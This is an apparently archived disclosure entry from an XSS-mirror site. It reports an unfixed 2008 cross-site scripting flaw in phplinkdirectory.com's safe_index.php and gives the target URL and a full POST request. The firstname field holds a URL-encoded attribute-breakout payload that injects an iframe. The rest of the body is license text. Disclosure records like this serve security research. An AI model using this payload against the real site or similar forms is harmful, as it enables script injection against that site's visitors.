Security researcher C1c4Tr1Z, has submitted on 25/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.phplinkdirectory.com, which at the time of submission ranked 205485 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 25/06/2008 |
Date published: 05/11/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: C1c4Tr1Z |
Domain: www.phplinkdirectory.com |
Category: XSS |
Pagerank: 205485 |
|---|
| URL: http://www.phplinkdirectory.com/articlescript/safe_index.php |
| POST: firstname=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fxssed.com%3E&lastname=&domain=&email=&actid=&login=&pas sword=&textarea=About+the+Supporters+Forum%3A%0D%0AIf+you+are+a+first+time+purchaser+of+phpLD%2C+it+ is+highly+recommended+that+you+also+purchase+access+to+the+Supporters+Forum+which+is+a+one+time+fee+ of+%2410.+This+is+where+support+questions+are+answered+for+v3.+This+item+is+priced+separately+so+tha t+you+don%27t+have+to+pay+for+it+twice+if+you+buy+additional+copies+of+phpLD.%0D%0A%0D%0AGeneral+Inf ormation%3A%0D%0A%0D%0AThis+software+is+for+use+only+to+those+who+have+purchased+a+license.%0D%0A%0D %0AA+license+must+be+purchased+for+EACH+installation+of+the+software.%0D%0A%0D%0ABy+using+the+softwa re+you+agree+to+the+terms.%0D%0A%0D%0ALicense%3A%0D%0AYou+may+not+redistribute%2C+sell+or+otherwise+ share+this+software+in+whole+or+in+part+without+the+consent+of+the+the+ownership+of+PHP+Link+Directo ry.+%0D%0AYou+agree+to+retain+a+link+back+to+http%3A%2F%2Fwww.phplinkdirectory.com%2F+on+all+pages+o f+your+directory+if+you+purchase+the+%2425+version+of+the+software.%0D%0ALicense+holders+are+entitle d+to+upgrades+to+the+3.0+branch+of+the+software+as+they+are+made+available+at+http%3A%2F%2Fwww.phpli nkdirectory.com%2F%0D%0AIn+some+cases%2C+license+holders+may+be+required+to+agree+to+changes+in+the+ software+license+before+receiving+updates+to+the+software.%0D%0AOwnership+of+the+license%28s%29+is+n ot+transferable+without+the+consent+of+the+ownershop+or+phpLinkDirectory.%0D%0A%0D%0ARefunds%3A%0D%0 AThe+ownership+of+phpLinkDirectory+is+not+ever+obligated+to+provide+a+refund.+%0D%0AHowever%2C+we+wi ll+do+everything+possible+to+provide+support+for+installation.%0D%0A%0D%0AFeatures%3A%0D%0AThe+owner ship+of+phpLinkDirectory+provides+no+promises+with+regard+to+features%2C+%0D%0Aand+cannot+be+held+re sponsible+for+features+that+do+not+function+as+expected.%0D%0AAgain%2C+we+will+try+to+provide+suppor t+through+the+forums+and+otherwise%2C%0D%0Abut+we+make+no+commitment+with+regard+to+speediness+or+co mpleteness+of+support.%0D%0A%0D%0AAdditional+Provisions%3A%0D%0AThe+software+is+provided+%22as+is%22 +without+warranty+of+any+kind%2C+expressed+or+implied%2C%0D%0Aincluding+but+not+limited+to+merchanta bility%2C+fitness+for+a+particular+purpose+or+otherwise.%0D%0AYou%2C+the+buyer%2C+agree+not+to+hold+ the+ownership+of+phpLinkDirectory+liable+for+any+damages%0D%0Aresulting+from+the+use+of+the+software .%0D%0A%0D%0ALicense+Revocation%3A%0D%0AThe+following+occurences+will+result+in+forfeture+of+the+lic ense+to+use+the+software%3A%0D%0A1.+Installing+the+software+on+additional+sites+without+purchasing+a +license%0D%0A2.+Failure+to+retain+the+link+back+to+phplinkdirectory.com+when+you+purchases+a+licens e+that+requires+link+back.%0D%0A3.+Making+false+statements+about+the+software+with+%22harmful+intent %22%0D%0A%0D%0AThe+above+statement+are+for+the+protection+of+the+ownership+of+phpLinkDirectory+and+t he+users+of+the+software.%0D%0AIt+is+our+hope+that+the+relationship+of+the+ownership+of+phpLinkDirec tory+and+its+users+will+positive+and+fruitful.%0D%0A%0D%0ANote%3A+Wherever+the+above+states+%22owner ship+of+phpLinkDirectory%22%2C+this+refers+to+the+ownership+of+phplinkdirectory.com.%0D%0A%09®ist er=Register |
|
Click here to view the mirror
|
|
|
| 
